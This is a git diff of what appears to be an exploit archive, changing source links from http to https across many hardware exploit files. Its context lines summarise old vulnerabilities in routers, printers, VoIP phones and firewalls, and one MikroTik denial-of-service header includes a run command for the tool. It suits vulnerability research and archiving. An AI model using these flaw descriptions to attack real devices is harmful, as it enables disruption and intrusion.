a/exploits/hardware/dos/30530.pl +++ b/exploits/hardware/dos/30530.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25446/info +source: https://www.securityfocus.com/bid/25446/info Thomson SpeedTouch 2030 is prone to a denial-of-service vulnerability because the device fails to handle specially crafted SIP INVITE messages. diff --git a/exploits/hardware/dos/30538.pl b/exploits/hardware/dos/30538.pl index f002b6349..150906473 100755 --- a/exploits/hardware/dos/30538.pl +++ b/exploits/hardware/dos/30538.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25464/info +source: https://www.securityfocus.com/bid/25464/info Thomson SpeedTouch 2030 is prone to a denial-of-service vulnerability because the device fails to handle specially crafted SIP INVITE messages. diff --git a/exploits/hardware/dos/30679.pl b/exploits/hardware/dos/30679.pl index f1721ffe8..c1f35c7c3 100755 --- a/exploits/hardware/dos/30679.pl +++ b/exploits/hardware/dos/30679.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26120/info +source: https://www.securityfocus.com/bid/26120/info Multiple Nortel Networks UNIStim VoIP telephony products are prone to a remote vulnerability that may allow eavesdropping. diff --git a/exploits/hardware/dos/31102.c b/exploits/hardware/dos/31102.c index 33b270ea6..998a8e109 100644 --- a/exploits/hardware/dos/31102.c +++ b/exploits/hardware/dos/31102.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27599/info +// source: https://www.securityfocus.com/bid/27599/info MikroTik RouterOS is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash an affected router, denying service to legitimate users. diff --git a/exploits/hardware/dos/31306.txt b/exploits/hardware/dos/31306.txt index a22f41a16..89203f54a 100644 --- a/exploits/hardware/dos/31306.txt +++ b/exploits/hardware/dos/31306.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28004/info +source: https://www.securityfocus.com/bid/28004/info Nortel UNIStim IP Phone products are prone to a remote denial-of-service vulnerability because the software fails to properly handle unexpected network datagrams. diff --git a/exploits/hardware/dos/31478.txt b/exploits/hardware/dos/31478.txt index e1482a9b4..115fb6afa 100644 --- a/exploits/hardware/dos/31478.txt +++ b/exploits/hardware/dos/31478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28414/info +source: https://www.securityfocus.com/bid/28414/info Linksys SPA-2102 Phone Adapter is prone to a denial-of-service vulnerability when handling multiple packets in quick succession. diff --git a/exploits/hardware/dos/31884.txt b/exploits/hardware/dos/31884.txt index b6b788356..44ba5516a 100644 --- a/exploits/hardware/dos/31884.txt +++ b/exploits/hardware/dos/31884.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29570/info +source: https://www.securityfocus.com/bid/29570/info Linksys WRH54G Wireless-G Router is prone to a denial-of-service vulnerability because it fails to adequately handle malformed HTTP requests. As a result, memory becomes corrupted and the device's HTTP service will crash. diff --git a/exploits/hardware/dos/32305.txt b/exploits/hardware/dos/32305.txt index 25d00b9b4..c34e67ae0 100644 --- a/exploits/hardware/dos/32305.txt +++ b/exploits/hardware/dos/32305.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30919/info +source: https://www.securityfocus.com/bid/30919/info Dreambox is prone to a remote denial-of-service vulnerability. diff --git a/exploits/hardware/dos/32341.html b/exploits/hardware/dos/32341.html index e1d6f7f3d..f547e1b60 100644 --- a/exploits/hardware/dos/32341.html +++ b/exploits/hardware/dos/32341.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31061/info +source: https://www.securityfocus.com/bid/31061/info Apple iPhone and iPod touch are prone to a remote denial-of-service vulnerability that occurs in the WebKit library used by the Safari browser. diff --git a/exploits/hardware/dos/32472.txt b/exploits/hardware/dos/32472.txt index 77303c7f2..283dc8056 100644 --- a/exploits/hardware/dos/32472.txt +++ b/exploits/hardware/dos/32472.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31703/info +source: https://www.securityfocus.com/bid/31703/info Nokia Web Browser for S60 is prone to a denial-of-service vulnerability when handling malicious HTML files. diff --git a/exploits/hardware/dos/32583.txt b/exploits/hardware/dos/32583.txt index 11b0f7d6f..f83d9e6b7 100644 --- a/exploits/hardware/dos/32583.txt +++ b/exploits/hardware/dos/32583.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32290/info +source: https://www.securityfocus.com/bid/32290/info NETGEAR WGR614 is prone to a denial-of-service vulnerability that occurs in the administration web interface. diff --git a/exploits/hardware/dos/32692.txt b/exploits/hardware/dos/32692.txt index 46b322e04..edfad5276 100644 --- a/exploits/hardware/dos/32692.txt +++ b/exploits/hardware/dos/32692.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33072/info +source: https://www.securityfocus.com/bid/33072/info Symbian S60 is prone to a denial-of-service vulnerability. diff --git a/exploits/hardware/dos/33216.txt b/exploits/hardware/dos/33216.txt index a50cd9e25..e0e09ce65 100644 --- a/exploits/hardware/dos/33216.txt +++ b/exploits/hardware/dos/33216.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36315/info +source: https://www.securityfocus.com/bid/36315/info Check Point Software Endpoint Security Full Disk Encryption for Microsoft Windows is prone to a remote denial-of-service vulnerability. diff --git a/exploits/hardware/dos/33280.txt b/exploits/hardware/dos/33280.txt index 699629bd3..7a99b772e 100644 --- a/exploits/hardware/dos/33280.txt +++ b/exploits/hardware/dos/33280.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36659/info +source: https://www.securityfocus.com/bid/36659/info Palm WebOS is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data. diff --git a/exploits/hardware/dos/33476.pl b/exploits/hardware/dos/33476.pl index 5cf77cd31..b8e9dd006 100755 --- a/exploits/hardware/dos/33476.pl +++ b/exploits/hardware/dos/33476.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37670/info +source: https://www.securityfocus.com/bid/37670/info JUNOS is prone to a remote denial-of-service vulnerability that arises when the application handles specially crafted TCP packets. diff --git a/exploits/hardware/dos/33583.pl b/exploits/hardware/dos/33583.pl index a569bab59..fa4ac683b 100755 --- a/exploits/hardware/dos/33583.pl +++ b/exploits/hardware/dos/33583.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38010/info +source: https://www.securityfocus.com/bid/38010/info Xerox WorkCentre is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/hardware/dos/34394.pl b/exploits/hardware/dos/34394.pl index ab2f39c21..65215f011 100755 --- a/exploits/hardware/dos/34394.pl +++ b/exploits/hardware/dos/34394.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42153/info +source: https://www.securityfocus.com/bid/42153/info D-Link WBR-2310 is prone to a remote buffer-overflow vulnerability because it fails to bounds-check user-supplied input before copying it into an insufficiently sized memory buffer. This issue occurs in the device's webserver. diff --git a/exploits/hardware/dos/35939.txt b/exploits/hardware/dos/35939.txt index 0561629ac..043e10964 100644 --- a/exploits/hardware/dos/35939.txt +++ b/exploits/hardware/dos/35939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48642/info +source: https://www.securityfocus.com/bid/48642/info The Alice Modem is prone to a cross-site scripting vulnerability and a denial-of-service vulnerability because the device fails to properly handle user-supplied input. diff --git a/exploits/hardware/dos/36868.pl b/exploits/hardware/dos/36868.pl index bb006ca3d..7ca4bab53 100755 --- a/exploits/hardware/dos/36868.pl +++ b/exploits/hardware/dos/36868.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52106/info +source: https://www.securityfocus.com/bid/52106/info Mercury MR804 router is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/hardware/dos/38483.txt b/exploits/hardware/dos/38483.txt index 24e414cd2..3e5ca6fbb 100644 --- a/exploits/hardware/dos/38483.txt +++ b/exploits/hardware/dos/38483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59325/info +source: https://www.securityfocus.com/bid/59325/info TP-LINK TL-WR741N and TL-WR741ND routers are prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests. diff --git a/exploits/hardware/dos/38493.txt b/exploits/hardware/dos/38493.txt index 3ff8e574f..01b391970 100644 --- a/exploits/hardware/dos/38493.txt +++ b/exploits/hardware/dos/38493.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59445/info +source: https://www.securityfocus.com/bid/59445/info The Cisco Linksys WRT310N Router is prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests. diff --git a/exploits/hardware/dos/39315.pl b/exploits/hardware/dos/39315.pl index 7d05dde2c..3b541bd7a 100755 --- a/exploits/hardware/dos/39315.pl +++ b/exploits/hardware/dos/39315.pl @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/69809/info +source: https://www.securityfocus.com/bid/69809/info Multiple Aztech routers are prone to a denial-of-service vulnerability. diff --git a/exploits/hardware/dos/41601.c b/exploits/hardware/dos/41601.c index a09443233..5645d52a5 100644 --- a/exploits/hardware/dos/41601.c +++ b/exploits/hardware/dos/41601.c @@ -1,3 +1,4 @@ +/* #Exploit Title: MikroTik Router Denial Of Service | ARP Table OverFlow #Exploit Author: Hosein Askari (FarazPajohan) #Vendor HomePage: https://mikrotik.com/ @@ -18,6 +19,7 @@ #Exploit Command : # ~~~#exploit.out -T0 -h -p [23,23] ################ +*/ #include #include diff --git a/exploits/hardware/dos/7535.php b/exploits/hardware/dos/7535.php index c52370346..2c042b57d 100644 --- a/exploits/hardware/dos/7535.php +++ b/exploits/hardware/dos/7535.php @@ -18,7 +18,7 @@ * * It has been suggested that this is a stack overflow vulnerability. * http://www.securiteam.com/securitynews/5NP0D15GUE.html -* http://www.securityfocus.com/bid/6301/info +* https://www.securityfocus.com/bid/6301/info * * unable to connect to 192.168.1.1:80 (Connection refused) * diff --git a/exploits/hardware/dos/8125.rb b/exploits/hardware/dos/8125.py similarity index 100% rename from exploits/hardware/dos/8125.rb rename to exploits/hardware/dos/8125.py diff --git a/exploits/hardware/local/20999.c b/exploits/hardware/local/20999.c index 29c02ab10..480c54b11 100644 --- a/exploits/hardware/local/20999.c +++ b/exploits/hardware/local/20999.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3008/info +// source: https://www.securityfocus.com/bid/3008/info ml85p is a Linux driver for Samsung ML-85G series printers. It may be bundled with distributions of Ghostscript. diff --git a/exploits/hardware/local/21000.sh b/exploits/hardware/local/21000.sh index e47153dea..c0c0732ab 100755 --- a/exploits/hardware/local/21000.sh +++ b/exploits/hardware/local/21000.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3008/info +source: https://www.securityfocus.com/bid/3008/info ml85p is a Linux driver for Samsung ML-85G series printers. It may be bundled with distributions of Ghostscript. diff --git a/exploits/hardware/local/21001.txt b/exploits/hardware/local/21001.txt index f9923c657..1967194a4 100644 --- a/exploits/hardware/local/21001.txt +++ b/exploits/hardware/local/21001.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3008/info +source: https://www.securityfocus.com/bid/3008/info ml85p is a Linux driver for Samsung ML-85G series printers. It may be bundled with distributions of Ghostscript. diff --git a/exploits/hardware/local/34954.txt b/exploits/hardware/local/34954.txt index f42c301a2..713dfbcdb 100644 --- a/exploits/hardware/local/34954.txt +++ b/exploits/hardware/local/34954.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44672/info +source: https://www.securityfocus.com/bid/44672/info Cisco Unified Communications Manager is prone to a local privilege-escalation vulnerability. diff --git a/exploits/hardware/remote/19444.txt b/exploits/hardware/remote/19444.txt index 095c765d6..2a1354331 100644 --- a/exploits/hardware/remote/19444.txt +++ b/exploits/hardware/remote/19444.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/564/info +source: https://www.securityfocus.com/bid/564/info The Dragon-Fire IDS remote web interface under version 1.0 has an insecure CGI script which allows for users to remotely execute commands as the user nobody. This could lead to a remote compromise of the system running Dragon-Fire. diff --git a/exploits/hardware/remote/19538.txt b/exploits/hardware/remote/19538.txt index 39edf60ef..17424450f 100644 --- a/exploits/hardware/remote/19538.txt +++ b/exploits/hardware/remote/19538.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/695/info +source: https://www.securityfocus.com/bid/695/info Hybrid Network's cable modems are vulnerable to several different types of attack due to a lack of authentication for the remote administration/configuration system. The cable modems use a protocol called HSMP, which uses UDP as its transport layer protocol. This makes it trivial to spoof packets and possible for hackers to compromise cable-modem subscribers anonymously. The possible consequences of this problem being exploited are very serious and range from denial of service attacks to running arbitrary code on the modem. diff --git a/exploits/hardware/remote/19554.c b/exploits/hardware/remote/19554.c index 2828d61c2..6e4a863c1 100644 --- a/exploits/hardware/remote/19554.c +++ b/exploits/hardware/remote/19554.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/714/info +source: https://www.securityfocus.com/bid/714/info Certain versions of Ascends (Lucent) router software listen on port 9 (UDP Discard). Ascend provides configuration tools for MAX and Pipeline routers that locate locally installed routers by broadcasting a specially formatted packet to UDP port 9. An attacker can send a similar but malformed packet to the same port that will cause MAX and Pipeline routers running certain software versions to crash. */ diff --git a/exploits/hardware/remote/19555.pl b/exploits/hardware/remote/19555.pl index 1bf82b94d..07e1674d3 100755 --- a/exploits/hardware/remote/19555.pl +++ b/exploits/hardware/remote/19555.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/714/info +source: https://www.securityfocus.com/bid/714/info Certain versions of Ascends (Lucent) router software listen on port 9 (UDP Discard). Ascend provides configuration tools for MAX and Pipeline routers that locate locally installed routers by broadcasting a specially formatted packet to UDP port 9. An attacker can send a similar but malformed packet to the same port that will cause MAX and Pipeline routers running certain software versions to crash. diff --git a/exploits/hardware/remote/19632.txt b/exploits/hardware/remote/19632.txt index 30c9451c4..f05f9a815 100644 --- a/exploits/hardware/remote/19632.txt +++ b/exploits/hardware/remote/19632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/806/info +source: https://www.securityfocus.com/bid/806/info Certain versions of the Tektronix PhaserLink printer ship with a webserver designed to help facilitate configuration of the device. This service is essentially administrator level access as it can completely modify the system characteristics, restart the machine, asign services etc. diff --git a/exploits/hardware/remote/19882.pl b/exploits/hardware/remote/19882.pl index e2f05bba9..22cb39a31 100755 --- a/exploits/hardware/remote/19882.pl +++ b/exploits/hardware/remote/19882.pl @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/1154/info +#source: https://www.securityfocus.com/bid/1154/info # #A denial of service attack exists in versions of Cisco IOS, running on a variety of different router hardware. If the router is configured to have a web server running for configuration and other information a user can cause the router to crash. # diff --git a/exploits/hardware/remote/19901.txt b/exploits/hardware/remote/19901.txt index b1b9465de..3ce4d14ea 100644 --- a/exploits/hardware/remote/19901.txt +++ b/exploits/hardware/remote/19901.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1177/info +source: https://www.securityfocus.com/bid/1177/info All R-series platforms with firmware between 4.3.8 and 4.6.2 (inclusive) allow users who already have access to the router to modify SNMP tables which they should not be able to access. The router has a command-line mode that is reached by typing control-N after the user has passed the intial login test. At the "#" prompt one can then do most management of the device. This includes the setting of SNMP community strings in spite of the limitation imposed by the administrator. diff --git a/exploits/hardware/remote/19943.txt b/exploits/hardware/remote/19943.txt index 43d7f1053..018db14ef 100644 --- a/exploits/hardware/remote/19943.txt +++ b/exploits/hardware/remote/19943.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1228/info +source: https://www.securityfocus.com/bid/1228/info The Intel Express 8100 and possibly 8200 ISDN routers can be remotely crashed by sending fragmented or oversized ICMP packets. diff --git a/exploits/hardware/remote/20067.c b/exploits/hardware/remote/20067.c index 9f5581025..dabe7b3d1 100644 --- a/exploits/hardware/remote/20067.c +++ b/exploits/hardware/remote/20067.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1454/info +// source: https://www.securityfocus.com/bid/1454/info A connection through a Cisco Secure PIX Firewall can be reset by a third party if the source and destination IP addresses and ports of the connection can be determined or inferred. This can be accomplished by sending a forged TCP Reset (RST) packet to the firewall, containing the same source and destination addresses and ports (in the TCP packet header) as the connection to be disrupted. The attacker would have to possess detailed knowledge of the connection table in the firewall (which is used to track outgoing connections and disallow any connections from the external network that were not initiated by an internal machine) or be able to otherwise determine the required IP address and port information to exploit this. diff --git a/exploits/hardware/remote/20231.txt b/exploits/hardware/remote/20231.txt index 887ff684d..4527d221b 100644 --- a/exploits/hardware/remote/20231.txt +++ b/exploits/hardware/remote/20231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1698/info +source: https://www.securityfocus.com/bid/1698/info Like other firewalls, the Cisco PIX Firewall implements technology that reads the contents of packets passing through it for application-level filtering. In the case of SMTP, it can be configured so only certain smtp commands can be allowed through (for example, dropping extra functionality, such as HELP or commands that could be a security concern, like EXPN or VRFY). When recieving messages, it allows all text through between "data" and ".", as this is where the body of the message would normally go and there could be words in it that are smtp commands which shouldn't be filtered. Due to the nature of SMTP and flaws in exceptional condition handling of PIX, it is reportedly possible to evade the smtp command restrictions by tricking the firewall into thinking the body of the message is being sent when it isn't. diff --git a/exploits/hardware/remote/20330.pl b/exploits/hardware/remote/20330.pl index bbab083d0..65e457886 100755 --- a/exploits/hardware/remote/20330.pl +++ b/exploits/hardware/remote/20330.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1846/info +source: https://www.securityfocus.com/bid/1846/info A vulnerability exists in the webserver configuration interface which will allow an anonymous user to execute commands. A http request which includes /exec and a known filename will reveal the contents of the particular file. In addition to disclosing the contents of files, this vulnerability could allow a user to execute arbitrary code. diff --git a/exploits/hardware/remote/20369.sh b/exploits/hardware/remote/20369.sh index 526a3b882..134a07b55 100755 --- a/exploits/hardware/remote/20369.sh +++ b/exploits/hardware/remote/20369.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1877/info +source: https://www.securityfocus.com/bid/1877/info The Cisco PIX is a popular firewall network device. diff --git a/exploits/hardware/remote/20372.pl b/exploits/hardware/remote/20372.pl index 2c9f09e99..8c3aeac3e 100755 --- a/exploits/hardware/remote/20372.pl +++ b/exploits/hardware/remote/20372.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1885/info +source: https://www.securityfocus.com/bid/1885/info A vulnerability exists in the Cisco Virtual Central Office 4000 (VCO/4K) programmable voice switch running software versions 5.13 and earlier. diff --git a/exploits/hardware/remote/20565.c b/exploits/hardware/remote/20565.c index 40697da36..9d418f930 100644 --- a/exploits/hardware/remote/20565.c +++ b/exploits/hardware/remote/20565.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2245/info +source: https://www.securityfocus.com/bid/2245/info Certain versions of HP JetDirect enabled printers provide a function (PJL command) that changes the LCD display on a printer over TCP/IP. Arbitrary strings can be sent to the LCD display by a remote user using this command. This represents more of a nuisance than a threat, although it is conceivable that the ability to modify the display could be used in some sort of "social engineering" scheme. */ diff --git a/exploits/hardware/remote/20652.txt b/exploits/hardware/remote/20652.txt index c2fff14d9..590f4d2cc 100644 --- a/exploits/hardware/remote/20652.txt +++ b/exploits/hardware/remote/20652.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2427/info +source: https://www.securityfocus.com/bid/2427/info IOS is the operating system designed for various Cisco devices. It is maintained and distributed by Cisco systems. diff --git a/exploits/hardware/remote/20806.txt b/exploits/hardware/remote/20806.txt index e9f017e5e..e9cea554a 100644 --- a/exploits/hardware/remote/20806.txt +++ b/exploits/hardware/remote/20806.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2659/info +source: https://www.securityfocus.com/bid/2659/info A remote vulnerability exists in Tektronix Phaser network printers in the 7xx, 8xx, and 9xx series. diff --git a/exploits/hardware/remote/20892.txt b/exploits/hardware/remote/20892.txt index b007721b9..8c11a3292 100644 --- a/exploits/hardware/remote/20892.txt +++ b/exploits/hardware/remote/20892.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2802/info +source: https://www.securityfocus.com/bid/2802/info Olicom routers were previously manufactured and distributed by Olicom, a company now owned by Intel. Olicom routers provide a low-cost routing solution for small businesses. diff --git a/exploits/hardware/remote/20975.pl b/exploits/hardware/remote/20975.pl index 6fadee885..79cd0d50e 100755 --- a/exploits/hardware/remote/20975.pl +++ b/exploits/hardware/remote/20975.pl @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/2936/info +# source: https://www.securityfocus.com/bid/2936/info # # IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches. # diff --git a/exploits/hardware/remote/20976.c b/exploits/hardware/remote/20976.c index 1bedce00d..db206448e 100644 --- a/exploits/hardware/remote/20976.c +++ b/exploits/hardware/remote/20976.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2936/info +source: https://www.securityfocus.com/bid/2936/info IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches. diff --git a/exploits/hardware/remote/20977.pl b/exploits/hardware/remote/20977.pl index ce2a7b2fa..9e8548118 100755 --- a/exploits/hardware/remote/20977.pl +++ b/exploits/hardware/remote/20977.pl @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/2936/info +# source: https://www.securityfocus.com/bid/2936/info # # IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches. # diff --git a/exploits/hardware/remote/20978.pl b/exploits/hardware/remote/20978.pl index b0a661a57..095b697ba 100755 --- a/exploits/hardware/remote/20978.pl +++ b/exploits/hardware/remote/20978.pl @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/2936/info +# source: https://www.securityfocus.com/bid/2936/info # # IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches. # diff --git a/exploits/hardware/remote/21011.pl b/exploits/hardware/remote/21011.pl index 0864a0a12..05f0f4556 100755 --- a/exploits/hardware/remote/21011.pl +++ b/exploits/hardware/remote/21011.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3034/info +source: https://www.securityfocus.com/bid/3034/info A vulnerability exists in certain models of 3Com hubs and potentially other 3Com network products. diff --git a/exploits/hardware/remote/21015.pl b/exploits/hardware/remote/21015.pl index 52aefe7e6..6c052daec 100755 --- a/exploits/hardware/remote/21015.pl +++ b/exploits/hardware/remote/21015.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3058/info +source: https://www.securityfocus.com/bid/3058/info SecureRemote is the proprietary VPN infrastructure designed by Check Point Software, and included with some versions of Firewall-1. diff --git a/exploits/hardware/remote/21186.txt b/exploits/hardware/remote/21186.txt index feef3a6fb..c342e1791 100644 --- a/exploits/hardware/remote/21186.txt +++ b/exploits/hardware/remote/21186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3711/info +source: https://www.securityfocus.com/bid/3711/info Prestige is a product line of DSL routers produced and distributed by Zyxel. diff --git a/exploits/hardware/remote/21243.pl b/exploits/hardware/remote/21243.pl index bdfb9842d..c364177c8 100755 --- a/exploits/hardware/remote/21243.pl +++ b/exploits/hardware/remote/21243.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3964/info +source: https://www.securityfocus.com/bid/3964/info Alteon ACEdirector is a hardware solution distributed by Nortel Networks. ACEdirector runs the Nortel WebOS operating system. diff --git a/exploits/hardware/remote/21285.txt b/exploits/hardware/remote/21285.txt index 9f6ceebba..5fae81745 100644 --- a/exploits/hardware/remote/21285.txt +++ b/exploits/hardware/remote/21285.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4062/info +source: https://www.securityfocus.com/bid/4062/info HP AdvanceStack 10Base-T Switching Hubs combine 10Base-T functionality with the performance of switching. diff --git a/exploits/hardware/remote/21378.txt b/exploits/hardware/remote/21378.txt index 5a5547689..bec7c1e1c 100644 --- a/exploits/hardware/remote/21378.txt +++ b/exploits/hardware/remote/21378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4507/info +source: https://www.securityfocus.com/bid/4507/info Nortel CVX 1800 Multi-Service Access Switch is a hardware modem bank. diff --git a/exploits/hardware/remote/21441.txt b/exploits/hardware/remote/21441.txt index f0a0b3e9b..1bdfce256 100644 --- a/exploits/hardware/remote/21441.txt +++ b/exploits/hardware/remote/21441.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4711/info +source: https://www.securityfocus.com/bid/4711/info The Cisco ATA-186 Analog Telephone Adapter is a hardware device designed to interface between analog telephones and Voice over IP (VoIP). It includes support for web based configuration. diff --git a/exploits/hardware/remote/21456.txt b/exploits/hardware/remote/21456.txt index e2d7e56c1..9e5e9c21e 100644 --- a/exploits/hardware/remote/21456.txt +++ b/exploits/hardware/remote/21456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4760/info +source: https://www.securityfocus.com/bid/4760/info IDS Device Manager is a web interface to the Cisco IDS systems. It is distributed and maintained by Cisco Systems. diff --git a/exploits/hardware/remote/21513.c b/exploits/hardware/remote/21513.c index 01c36bbda..d9c01b52b 100644 --- a/exploits/hardware/remote/21513.c +++ b/exploits/hardware/remote/21513.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4946/info +// source: https://www.securityfocus.com/bid/4946/info The 1100 series routers are a broadband connectivity solution distributed by Telindus. diff --git a/exploits/hardware/remote/21699.txt b/exploits/hardware/remote/21699.txt index b4ede832c..b652aa0fe 100644 --- a/exploits/hardware/remote/21699.txt +++ b/exploits/hardware/remote/21699.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5436/info +source: https://www.securityfocus.com/bid/5436/info Orinoco is the manufacturer of various wireless network components, including access points and network cards. diff --git a/exploits/hardware/remote/21827.txt b/exploits/hardware/remote/21827.txt index eec9e939f..49f2b1327 100644 --- a/exploits/hardware/remote/21827.txt +++ b/exploits/hardware/remote/21827.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5780/info +source: https://www.securityfocus.com/bid/5780/info It has been reported that the Compaq Insight Manager web interface is prone to cross-site scripting attacks. It is possible to construct a malicious link to a Compaq Insight Manager web interface that includes arbitrary script code. When the link is visited with a web client, the script code will execute in the context of the Compaq Insight Manager web interface. diff --git a/exploits/hardware/remote/21944.pl b/exploits/hardware/remote/21944.pl index 04bfe1390..fc0edf45d 100755 --- a/exploits/hardware/remote/21944.pl +++ b/exploits/hardware/remote/21944.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5976/info +source: https://www.securityfocus.com/bid/5976/info Certain versions of Cisco CatOS ship with an embedded HTTP server. Switches that run these versions of CatOS are prone to a denial of service, which is due to a remote buffer overflow condition in the HTTP server. diff --git a/exploits/hardware/remote/21983.c b/exploits/hardware/remote/21983.c index 7a58f25f9..a2a8abc26 100644 --- a/exploits/hardware/remote/21983.c +++ b/exploits/hardware/remote/21983.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6100/info +// source: https://www.securityfocus.com/bid/6100/info An information disclosure vulnerability has been discovered in GlobalSunTech access points. diff --git a/exploits/hardware/remote/22236.txt b/exploits/hardware/remote/22236.txt index b16bcff9e..2362ada34 100644 --- a/exploits/hardware/remote/22236.txt +++ b/exploits/hardware/remote/22236.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6807/info +source: https://www.securityfocus.com/bid/6807/info Netgear FM114P Wireless Firewalls allow directory traversal using escaped character sequences. It is possible for an unauthenticated user to retrieve the firewall's configuration file by escaping from the /upnp/service directory. diff --git a/exploits/hardware/remote/22244.txt b/exploits/hardware/remote/22244.txt index cda7337e5..0f0a37a17 100644 --- a/exploits/hardware/remote/22244.txt +++ b/exploits/hardware/remote/22244.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6824/info +source: https://www.securityfocus.com/bid/6824/info The Ericsson HM220dp DSL Modem uses a web interface for remote administration and configuration. This interface does not require any authentication in order to access. There is no option to enable any authentication requirement. diff --git a/exploits/hardware/remote/22271.c b/exploits/hardware/remote/22271.c index 86d92e103..c8da64283 100644 --- a/exploits/hardware/remote/22271.c +++ b/exploits/hardware/remote/22271.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6895/info +// source: https://www.securityfocus.com/bid/6895/info Cisco IOS is prone to a remotely exploitable buffer overflow condition when handling malformed OSPF (Open Shortest Path First) packets. The overflow occurs when more than 255 OSPF neighbors are announced. This may make it possible to execute malicious instructions on a device running a vulnerable version of the software. Denial of service is also possible. diff --git a/exploits/hardware/remote/22319.txt b/exploits/hardware/remote/22319.txt index e9af3b4ea..87daf7fc1 100644 --- a/exploits/hardware/remote/22319.txt +++ b/exploits/hardware/remote/22319.txt @@ -1,6 +1,6 @@ HP JetDirect J2552A/J2552B/J2591A/J3110A/J3111A/J3113A/J3263A/300.0 X Printer SNMP JetAdmin Device Password Disclosure Vulnerability -source: http://www.securityfocus.com/bid/7001/info +source: https://www.securityfocus.com/bid/7001/info A problem with JetDirect printers could make it possible for a remote user to gain administrative access to the printer. diff --git a/exploits/hardware/remote/22350.txt b/exploits/hardware/remote/22350.txt index bcafba77c..ec5eba190 100644 --- a/exploits/hardware/remote/22350.txt +++ b/exploits/hardware/remote/22350.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7081/info +source: https://www.securityfocus.com/bid/7081/info It has been reported that some models of the SGSN made by Nokia do not properly handle remote requests for information. Vulnerable devices may disclose sensitive information which could enable an attacker may be able to mount further attacks on network 